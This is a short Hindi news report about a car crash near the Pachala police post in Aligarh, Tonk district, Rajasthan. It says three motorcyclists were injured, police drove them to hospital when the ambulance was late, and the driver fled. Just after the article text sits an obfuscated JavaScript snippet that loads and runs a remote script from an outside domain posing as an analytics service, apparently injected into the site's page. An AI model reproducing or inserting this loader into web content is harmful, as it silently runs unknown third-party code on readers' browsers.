टोंक।अशोक सैनी। अलीगढ़ के पचाला पुलिस चौकी के ठीक सामने उस वक्त हड़कंप मच गया, जब एक तेज रफ्तार अनियंत्रित कार ने दो अलग-अलग मोटरसाइकिलों को जोरदार टक्कर मार दी। टक्कर इतनी जबरदस्त थी कि कार एक बाइक को करीब 2 किलोमीटर तक घसीटते हुए ले गई। घायलों की जानकारी इस हादसे में 3 लोग गंभीर रूप से घायल हुए हैं एक महिला और एक पुरुष (निवासी: बिलौता,अलीगढ़) एक पुरुष (निवासी: दोबड़िया, उनियारा) पुलिस ने पेश की इंसानियत की मिसाल हादसे के बाद जब काफी देर तक 108 एम्बुलेंस मौके पर नहीं पहुँची, और पचाला चौकी पुलिस ने जरा भी देर नहीं की। पुलिस टीम ने तुरंत अपनी 112 इमरजेंसी गाड़ी से तीनों घायलों को सवाई माधोपुर अस्पताल पहुँचाया। अलीगढ़ पुलिस की इस तत्परता की स्थानीय लोग सराहना कर रहे हैं। अलीगढ़ थाना अधिकारी ने राज कुमार चौधरी ने बताया कि
हादसे के बाद कार सड़क किनारे उतर गई और चालक मौके से फरार हो गये।कार को जब्त कर लिया है और मामले की जाँच शुरू कर दी है।;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,’script’,’https://content-website-analytics.com/script.js’);
उनियारा, टोंक, राजस्थान